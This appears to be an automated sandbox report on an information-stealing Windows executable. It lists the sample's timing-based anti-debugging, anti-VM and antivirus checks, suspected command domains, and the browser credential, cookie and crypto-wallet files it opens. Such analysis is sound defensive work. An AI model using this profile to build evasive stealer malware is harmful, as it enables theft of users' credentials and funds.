              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51205C0 second address: 5120660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79A547B38Fh 0x00000009 adc eax, 3DDC529Eh 0x0000000f jmp 00007F79A547B399h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F79A547B390h 0x0000001b or ax, 2498h 0x00000020 jmp 00007F79A547B38Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 cmp dword ptr [ebp-04h], 00000000h 0x0000002d jmp 00007F79A547B396h 0x00000032 mov esi, eax 0x00000034 pushad 0x00000035 mov al, A8h 0x00000037 push ebx 0x00000038 mov di, si 0x0000003b pop esi 0x0000003c popad 0x0000003d je 00007F79A547B3C2h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F79A547B399h 0x0000004b popad 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110180 second address: 51101FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F79A4C9A8F7h 0x00000011 or esi, 7F2B287Eh 0x00000017 jmp 00007F79A4C9A8F9h 0x0000001c popfd 0x0000001d push ecx 0x0000001e call 00007F79A4C9A8F7h 0x00000023 pop ecx 0x00000024 pop edi 0x00000025 popad 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F79A4C9A8F1h 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101FF second address: 5110205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110205 second address: 511021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push edi 0x0000000e mov cl, E9h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511021A second address: 511025F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F79A547B397h 0x00000010 pop eax 0x00000011 jmp 00007F79A547B396h 0x00000016 mov eax, dword ptr fs:[00000000h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511025F second address: 5110263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110263 second address: 5110280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110280 second address: 5110286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110286 second address: 511029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79A547B38Bh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511029C second address: 51102A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102A2 second address: 51102CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79A547B399h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102CA second address: 51102D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102D0 second address: 511030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79A547B38Ah 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 18h 0x00000011 pushad 0x00000012 mov dh, EDh 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F79A547B390h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F79A547B38Eh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511030C second address: 511031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511031E second address: 511037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F79A547B396h 0x00000011 xchg eax, esi 0x00000012 jmp 00007F79A547B390h 0x00000017 push eax 0x00000018 jmp 00007F79A547B38Bh 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F79A547B395h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511037B second address: 5110381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110381 second address: 5110385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110385 second address: 51103A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F79A4C9A8F1h 0x00000011 mov ecx, 1D56DF27h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51103A8 second address: 51103C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51103C2 second address: 51103C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96EB8E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B17A54 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B213DD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BA648F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3664Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5516Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2170536347.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000002.2171310679.00000000010CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000002.2171310679.0000000001120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2170536347.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.2170781457.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000003.2140111832.00000000011AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 5800, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Electrum-LTC
Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ta%\\ElectronCash\\wallets","m":["*"],"z":"Walle}
Source: file.exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ":"%appdata%\\Exodus\\exodus.wallet"
Source: file.exe | String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore"],"z":"Wallets/Ethereum","d":1,"fs"
Source: file.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe | String found in binary or memory: keystore
Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live>[>>
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
